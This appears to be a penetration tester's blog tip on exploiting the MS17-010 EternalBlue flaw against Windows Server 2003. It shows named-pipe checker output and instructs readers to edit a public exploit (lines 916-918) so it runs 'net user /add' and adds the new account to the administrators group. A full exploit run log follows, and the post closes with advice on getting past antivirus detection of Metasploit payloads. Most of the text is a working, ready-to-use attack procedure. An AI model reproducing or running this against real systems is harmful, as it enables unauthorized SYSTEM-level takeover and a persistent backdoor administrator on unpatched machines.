Exploiting MS17-010 EternalBlue Vulnerability

Here is a quick tip for you: If you are a Pentester that rely on Metasploit module exploit/windows/smb/ms17_010_psexec, you often get errors of missing named pipes when trying to own Windows 2003. If you have this problem, I recommend to run MS17-010/checker.py, if you have prbs running it, make sure you have MYSMB package in the same directory of checkery.py:

# python checker.py 192.168.102.31
Target OS: Windows Server 2003 R2 3790 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (32 bit)
netlogon: Ok (32 bit)
lsarpc: Ok (32 bit)
browser: Ok (32 bit)

If the named pipes are successfully identified, you can proceed to exploitation. As an alternative, You can opt for EBID: 43215 EternalBlue exploit. You will need to modify line no 916-918:

916         print('creating file c:\\pwned.txt on the target')
917         tid2 = smbConn.connectTree('C$')
918         fid2 = smbConn.createFile(tid2, '/pwned.txt')
919         smbConn.closeFile(tid2, fid2)

To:

916         print('creating user hacker on target')
917         tid2 = smbConn.connectTree('C$')
918         service_exec(conn, r'net user /add hacker mypassword123 && net localgroup administrators hacker /add') 
919         smbConn.closeFile(tid2, fid2)

Run the exploit:

# python 42315.py 192.168.102.31 samr
Target OS: Windows Server 2003 R2 3790 Service Pack 1
Using named pipe: samr
Groom packets
attempt controlling next transaction on x64
attempt controlling next transaction on x86
success controlling one transaction
Target is x86
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x87988d48
SESSION: 0xed4615c8
FLINK: 0x5bd48
InData: 0x5ae28
MID: 0xa
TRANS1: 0x58b50
TRANS2: 0x5ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xeecd9ed8
userAndGroupCount: 0x5
userAndGroupsAddr: 0xeecd9f78
overwriting token UserAndGroups
add user r00tpgp on the target
Opening SVCManager on 192.168.102.31.....
Creating service xHnm.....
Starting service xHnm.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service xHnm.....
Opening SVCManager on 192.168.102.31.....
Creating service Vdji.....
Starting service Vdji.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service Vdji.....
Done

You can safely disregard the errors and rdp to the target ip addr with your new credentials :-) or you can opt to execute other creative cmd to gain remote execution or shell on the system. You should not have any problems exploiting Windows 2003 or below. Unfortunately, on Windows 2008 and beyond, you will need an smb account on the victim host to successfully pwn it. It seems that MS had made some changes to the SMB  named pipes that added a slight layer of complexity to the EternalBlue exploit.

It's been more than a year since this exploit was made public, but many organizations still fail to patch their systems. Making this exploit  very relevant when performing penetration testing or during red team engagements.

Note:

Another thing that you should know when popping shells using Metasploit; AV scanners can easily detect the payloads. So, if you wonder why your funky meterpreter, reverse/bind tcp shell or cmd exec are not working, you can blame AV. All the more reasons to use alternative exploits.